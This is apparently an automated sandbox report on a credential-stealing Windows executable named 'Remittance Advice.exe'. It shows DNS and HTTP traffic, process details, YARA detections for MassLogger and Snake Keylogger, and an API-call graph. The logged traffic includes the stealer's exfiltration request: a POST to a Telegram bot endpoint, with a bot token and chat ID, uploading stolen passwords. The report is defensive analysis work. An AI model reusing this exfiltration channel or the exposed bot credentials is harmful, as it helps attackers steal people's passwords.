                                                                                        Jan 13, 2025 13:05:32.423326969 CET44349708104.21.32.1192.168.2.7
                                                                                        Jan 13, 2025 13:05:32.498848915 CET44349708104.21.32.1192.168.2.7
                                                                                        Jan 13, 2025 13:05:32.498914957 CET44349708104.21.32.1192.168.2.7
                                                                                        Jan 13, 2025 13:05:32.498951912 CET49708443192.168.2.7104.21.32.1
                                                                                        Jan 13, 2025 13:05:32.507652044 CET49708443192.168.2.7104.21.32.1
                                                                                        Jan 13, 2025 13:05:37.909594059 CET4970780192.168.2.7193.122.130.0
                                                                                        Jan 13, 2025 13:05:37.914381027 CET8049707193.122.130.0192.168.2.7
                                                                                        Jan 13, 2025 13:05:38.011900902 CET8049707193.122.130.0192.168.2.7
                                                                                        Jan 13, 2025 13:05:38.057995081 CET4970780192.168.2.7193.122.130.0
                                                                                        Jan 13, 2025 13:05:38.108341932 CET49712443192.168.2.7149.154.167.220
                                                                                        Jan 13, 2025 13:05:38.108366966 CET44349712149.154.167.220192.168.2.7
                                                                                        Jan 13, 2025 13:05:38.108414888 CET49712443192.168.2.7149.154.167.220
                                                                                        Jan 13, 2025 13:05:38.109041929 CET49712443192.168.2.7149.154.167.220
                                                                                        Jan 13, 2025 13:05:38.109055996 CET44349712149.154.167.220192.168.2.7
                                                                                        Jan 13, 2025 13:05:38.720987082 CET44349712149.154.167.220192.168.2.7
                                                                                        Jan 13, 2025 13:05:38.721049070 CET49712443192.168.2.7149.154.167.220
                                                                                        Jan 13, 2025 13:05:38.723057985 CET49712443192.168.2.7149.154.167.220
                                                                                        Jan 13, 2025 13:05:38.723062992 CET44349712149.154.167.220192.168.2.7
                                                                                        Jan 13, 2025 13:05:38.723392963 CET44349712149.154.167.220192.168.2.7
                                                                                        Jan 13, 2025 13:05:38.725199938 CET49712443192.168.2.7149.154.167.220
                                                                                        Jan 13, 2025 13:05:38.767322063 CET44349712149.154.167.220192.168.2.7
                                                                                        Jan 13, 2025 13:05:38.767433882 CET49712443192.168.2.7149.154.167.220
                                                                                        Jan 13, 2025 13:05:38.767438889 CET44349712149.154.167.220192.168.2.7
                                                                                        Jan 13, 2025 13:05:39.008896112 CET44349712149.154.167.220192.168.2.7
                                                                                        Jan 13, 2025 13:05:39.009032011 CET44349712149.154.167.220192.168.2.7
                                                                                        Jan 13, 2025 13:05:39.009179115 CET49712443192.168.2.7149.154.167.220
                                                                                        Jan 13, 2025 13:05:39.009692907 CET49712443192.168.2.7149.154.167.220
                                                                                        Jan 13, 2025 13:06:43.012000084 CET8049707193.122.130.0192.168.2.7
                                                                                        Jan 13, 2025 13:06:43.012203932 CET4970780192.168.2.7193.122.130.0
                                                                                        Jan 13, 2025 13:07:12.539242029 CET4970780192.168.2.7193.122.130.0
                                                                                        Jan 13, 2025 13:07:12.544136047 CET8049707193.122.130.0192.168.2.7
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jan 13, 2025 13:05:29.947690964 CET5585053192.168.2.71.1.1.1
                                                                                        Jan 13, 2025 13:05:29.954607010 CET53558501.1.1.1192.168.2.7
                                                                                        Jan 13, 2025 13:05:31.817876101 CET4951253192.168.2.71.1.1.1
                                                                                        Jan 13, 2025 13:05:31.824997902 CET53495121.1.1.1192.168.2.7
                                                                                        Jan 13, 2025 13:05:38.100150108 CET6028853192.168.2.71.1.1.1
                                                                                        Jan 13, 2025 13:05:38.107002020 CET53602881.1.1.1192.168.2.7
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Jan 13, 2025 13:05:29.947690964 CET192.168.2.71.1.1.10xbed2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 13:05:31.817876101 CET192.168.2.71.1.1.10x93Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 13:05:38.100150108 CET192.168.2.71.1.1.10x78d3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Jan 13, 2025 13:05:29.954607010 CET1.1.1.1192.168.2.70xbed2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Jan 13, 2025 13:05:29.954607010 CET1.1.1.1192.168.2.70xbed2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 13:05:29.954607010 CET1.1.1.1192.168.2.70xbed2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 13:05:29.954607010 CET1.1.1.1192.168.2.70xbed2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 13:05:29.954607010 CET1.1.1.1192.168.2.70xbed2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 13:05:29.954607010 CET1.1.1.1192.168.2.70xbed2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 13:05:31.824997902 CET1.1.1.1192.168.2.70x93No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 13:05:31.824997902 CET1.1.1.1192.168.2.70x93No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 13:05:31.824997902 CET1.1.1.1192.168.2.70x93No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 13:05:31.824997902 CET1.1.1.1192.168.2.70x93No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 13:05:31.824997902 CET1.1.1.1192.168.2.70x93No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 13:05:31.824997902 CET1.1.1.1192.168.2.70x93No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 13:05:31.824997902 CET1.1.1.1192.168.2.70x93No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 13:05:38.107002020 CET1.1.1.1192.168.2.70x78d3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                        • reallyfreegeoip.org
                                                                                        • api.telegram.org
                                                                                        • checkip.dyndns.org
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.749707193.122.130.0807068C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 13, 2025 13:05:29.978723049 CET151OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Connection: Keep-Alive
                                                                                        Jan 13, 2025 13:05:31.265414000 CET321INHTTP/1.1 200 OK
                                                                                        Date: Mon, 13 Jan 2025 12:05:31 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        X-Request-ID: d03b2f885c8ae2f9c781f88c5286cbd5
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                        Jan 13, 2025 13:05:31.694056034 CET127OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Jan 13, 2025 13:05:31.795027971 CET321INHTTP/1.1 200 OK
                                                                                        Date: Mon, 13 Jan 2025 12:05:31 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        X-Request-ID: af182f16c95d437bca23b5c705aab0ba
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                        Jan 13, 2025 13:05:37.909594059 CET127OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Jan 13, 2025 13:05:38.011900902 CET321INHTTP/1.1 200 OK
                                                                                        Date: Mon, 13 Jan 2025 12:05:37 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        X-Request-ID: b84c8da3429a4f0b88a6e6208ff8e50a
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.749708104.21.32.14437068C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-01-13 12:05:32 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                        Host: reallyfreegeoip.org
                                                                                        Connection: Keep-Alive
                                                                                        2025-01-13 12:05:32 UTC851INHTTP/1.1 200 OK
                                                                                        Date: Mon, 13 Jan 2025 12:05:32 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Age: 2084721
                                                                                        Cache-Control: max-age=31536000
                                                                                        cf-cache-status: HIT
                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dz1aG6WHnaeQLLUB8Wye0GtsBKXhDl4f07CgSpCH34wtJXydlPR3%2BntF1oTtn3NYpwClNiHKLOgY6jd9X43n3fqpggJ3Crxm4pr65IuesWIBDvVWudwPU2XwuD5mNM3wwAZuUieS"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9015414dba8441a6-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1583&rtt_var=596&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1833019&cwnd=241&unsent_bytes=0&cid=2c7829bc23201a18&ts=187&x=0"
                                                                                        2025-01-13 12:05:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.749712149.154.167.2204437068C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-01-13 12:05:38 UTC299OUTPOST /bot7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8/sendDocument?chat_id=6410945890&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary================8dd33a0aebb4d1a
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 1088
                                                                                        Connection: Keep-Alive
                                                                                        2025-01-13 12:05:38 UTC1088OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 61 30 61 65 62 62 34 64 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: --===============8dd33a0aebb4d1aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                        2025-01-13 12:05:39 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Mon, 13 Jan 2025 12:05:38 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 540
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2025-01-13 12:05:39 UTC540INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 39 32 35 34 35 31 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 32 30 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 61 7a 69 73 6d 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 34 31 30 39 34 35 38 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 6d 61 6e 75 65 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 69 63 68 61 65 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 39 39 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22
                                                                                        Data Ascii: {"ok":true,"result":{"message_id":839,"from":{"id":7509254516,"is_bot":true,"first_name":"NOVA2025","username":"Razismbot"},"chat":{"id":6410945890,"first_name":"Emmanuel","last_name":"Michael","type":"private"},"date":1736769938,"document":{"file_name":"


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:07:05:28
                                                                                        Start date:13/01/2025
                                                                                        Path:C:\Users\user\Desktop\Remittance Advice.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Remittance Advice.exe"
                                                                                        Imagebase:0xf90000
                                                                                        File size:205'312 bytes
                                                                                        MD5 hash:667EFC5A5AC024A15CE73A7A352EA598
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:07:05:29
                                                                                        Start date:13/01/2025
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:10%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:2.4%
                                                                                          Total number of Nodes:123
                                                                                          Total number of Limit Nodes:10
                                                                                          execution_graph 18312 30e4668 18313 30e4669 18312->18313 18314 30e4686 18313->18314 18318 30e4778 18313->18318 18323 30e3e1c 18314->18323 18316 30e46a5 18319 30e477c 18318->18319 18327 30e4878 18319->18327 18331 30e4888 18319->18331 18324 30e3e27 18323->18324 18339 30e5cec 18324->18339 18326 30e72f8 18326->18316 18329 30e487c 18327->18329 18328 30e498c 18328->18328 18329->18328 18335 30e449c 18329->18335 18333 30e4889 18331->18333 18332 30e498c 18332->18332 18333->18332 18334 30e449c CreateActCtxA 18333->18334 18334->18332 18336 30e5918 CreateActCtxA 18335->18336 18338 30e59db 18336->18338 18340 30e5cf7 18339->18340 18343 30e5d0c 18340->18343 18342 30e739d 18342->18326 18344 30e5d17 18343->18344 18347 30e5d3c 18344->18347 18346 30e747a 18346->18342 18348 30e5d47 18347->18348 18351 30e5d6c 18348->18351 18350 30e756d 18350->18346 18352 30e5d77 18351->18352 18354 30e8acb 18352->18354 18357 30ead71 18352->18357 18353 30e8b09 18353->18350 18354->18353 18360 30ece60 18354->18360 18365 30eb1b0 18357->18365 18361 30ece64 18360->18361 18362 30eceb5 18361->18362 18373 30ed418 18361->18373 18377 30ed428 18361->18377 18362->18353 18368 30eb298 18365->18368 18366 30ead86 18366->18354 18369 30eb2dc 18368->18369 18370 30eb2b9 18368->18370 18369->18366 18370->18369 18371 30eb4e0 GetModuleHandleW 18370->18371 18372 30eb50d 18371->18372 18372->18366 18374 30ed41c 18373->18374 18375 30ed46f 18374->18375 18381 30ed230 18374->18381 18375->18362 18378 30ed42d 18377->18378 18379 30ed46f 18378->18379 18380 30ed230 3 API calls 18378->18380 18379->18362 18380->18379 18382 30ed23b 18381->18382 18384 30edd80 18382->18384 18385 30ed35c 18382->18385 18384->18384 18386 30ed367 18385->18386 18387 30e5d6c 3 API calls 18386->18387 18388 30eddef 18387->18388 18391 30eddfe 18388->18391 18392 30ee270 18388->18392 18396 30ee267 18388->18396 18391->18384 18393 30ee29e 18392->18393 18394 30ee36a KiUserCallbackDispatcher 18393->18394 18395 30ee36f 18393->18395 18394->18395 18397 30ee29e 18396->18397 18398 30ee36a KiUserCallbackDispatcher 18397->18398 18399 30ee36f 18397->18399 18398->18399 18400 30ed788 DuplicateHandle 18401 30ed81e 18400->18401 18412 7541648 18414 75416ad 18412->18414 18413 75416fa 18414->18413 18417 7541ee8 18414->18417 18424 7541ed8 18414->18424 18418 7541f07 18417->18418 18431 7541fd0 18418->18431 18437 7541fc0 18418->18437 18419 7541f3b 18443 75410f8 18419->18443 18421 7541f4a 18421->18413 18425 7541f07 18424->18425 18429 7541fd0 2 API calls 18425->18429 18430 7541fc0 2 API calls 18425->18430 18426 7541f3b 18427 75410f8 GetCurrentThreadId 18426->18427 18428 7541f4a 18427->18428 18428->18413 18429->18426 18430->18426 18432 754201f GetCurrentThreadId 18431->18432 18434 7542065 18432->18434 18447 754114c 18434->18447 18438 754201f GetCurrentThreadId 18437->18438 18440 7542065 18438->18440 18441 754114c EnumThreadWindows 18440->18441 18442 75420a0 18441->18442 18442->18419 18444 7541103 18443->18444 18445 75423ec GetCurrentThreadId 18444->18445 18446 7542417 18444->18446 18445->18446 18446->18421 18450 7541153 EnumThreadWindows 18447->18450 18449 75420a0 18449->18419 18450->18449 18451 7540ca8 18452 7540cc0 18451->18452 18453 7540cd9 18452->18453 18457 7540fd8 18452->18457 18462 7540fc9 18452->18462 18454 7540cfc 18458 7540fe3 18457->18458 18459 7540ff3 18458->18459 18467 7541430 OleInitialize 18458->18467 18469 7541428 18458->18469 18459->18454 18464 7540fd8 18462->18464 18463 7540ff3 18463->18454 18464->18463 18465 7541430 OleInitialize 18464->18465 18466 7541428 OleInitialize 18464->18466 18465->18463 18466->18463 18468 7541494 18467->18468 18468->18459 18470 7541430 OleInitialize 18469->18470 18471 7541494 18470->18471 18471->18459 18402 30ed540 18403 30ed541 GetCurrentProcess 18402->18403 18405 30ed5d8 GetCurrentThread 18403->18405 18406 30ed5d1 18403->18406 18407 30ed60e 18405->18407 18408 30ed615 GetCurrentProcess 18405->18408 18406->18405 18407->18408 18411 30ed64b 18408->18411 18409 30ed673 GetCurrentThreadId 18410 30ed6a4 18409->18410 18411->18409
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1454048468.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 358cf7745f6b03bcb9e43fa1bf63e5f2b01ffb7dc0c9df341eefcbef31148a44
                                                                                          • Instruction ID: 8fb9712bf24e62435e815c0ab0ba8f1997162c69496e58009946282c0ea425d4
                                                                                          • Opcode Fuzzy Hash: 358cf7745f6b03bcb9e43fa1bf63e5f2b01ffb7dc0c9df341eefcbef31148a44
                                                                                          • Instruction Fuzzy Hash: B4F13CB4A0060ACFDB14DFA5C948B9DBBF2FF84308F158569E409AF255DB70AD85CB81

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 296 30ed530-30ed538 297 30ed53a 296->297 298 30ed4f7-30ed52f 296->298 299 30ed53c 297->299 300 30ed541-30ed5cf GetCurrentProcess 297->300 299->300 307 30ed5d8-30ed60c GetCurrentThread 300->307 308 30ed5d1-30ed5d7 300->308 310 30ed60e-30ed614 307->310 311 30ed615-30ed649 GetCurrentProcess 307->311 308->307 310->311 313 30ed64b-30ed651 311->313 314 30ed652-30ed66d call 30ed710 311->314 313->314 317 30ed673-30ed6a2 GetCurrentThreadId 314->317 318 30ed6ab-30ed70d 317->318 319 30ed6a4-30ed6aa 317->319 319->318
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 030ED5BE
                                                                                          • GetCurrentThread.KERNEL32 ref: 030ED5FB
                                                                                          • GetCurrentProcess.KERNEL32 ref: 030ED638
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 030ED691
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID: 4'q
                                                                                          • API String ID: 2063062207-1807707664
                                                                                          • Opcode ID: b05936f2beb5d4d8983bb4446f8d0e7b71bfc90d3b68fd473d6c289a4149520d
                                                                                          • Instruction ID: 19a1f201901a9fcfcec871947eaeb9c4881874811fdaf4437ad3dabcddf9bf05
                                                                                          • Opcode Fuzzy Hash: b05936f2beb5d4d8983bb4446f8d0e7b71bfc90d3b68fd473d6c289a4149520d
                                                                                          • Instruction Fuzzy Hash: 746179B0A013498FDB14DFA9D548BDEBBF1FF88304F248459E419AB360DB34A945CB66

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 326 30ed540-30ed5cf GetCurrentProcess 331 30ed5d8-30ed60c GetCurrentThread 326->331 332 30ed5d1-30ed5d7 326->332 333 30ed60e-30ed614 331->333 334 30ed615-30ed649 GetCurrentProcess 331->334 332->331 333->334 336 30ed64b-30ed651 334->336 337 30ed652-30ed66d call 30ed710 334->337 336->337 340 30ed673-30ed6a2 GetCurrentThreadId 337->340 341 30ed6ab-30ed70d 340->341 342 30ed6a4-30ed6aa 340->342 342->341
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 030ED5BE
                                                                                          • GetCurrentThread.KERNEL32 ref: 030ED5FB
                                                                                          • GetCurrentProcess.KERNEL32 ref: 030ED638
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 030ED691
                                                                                          Memory Dump Source
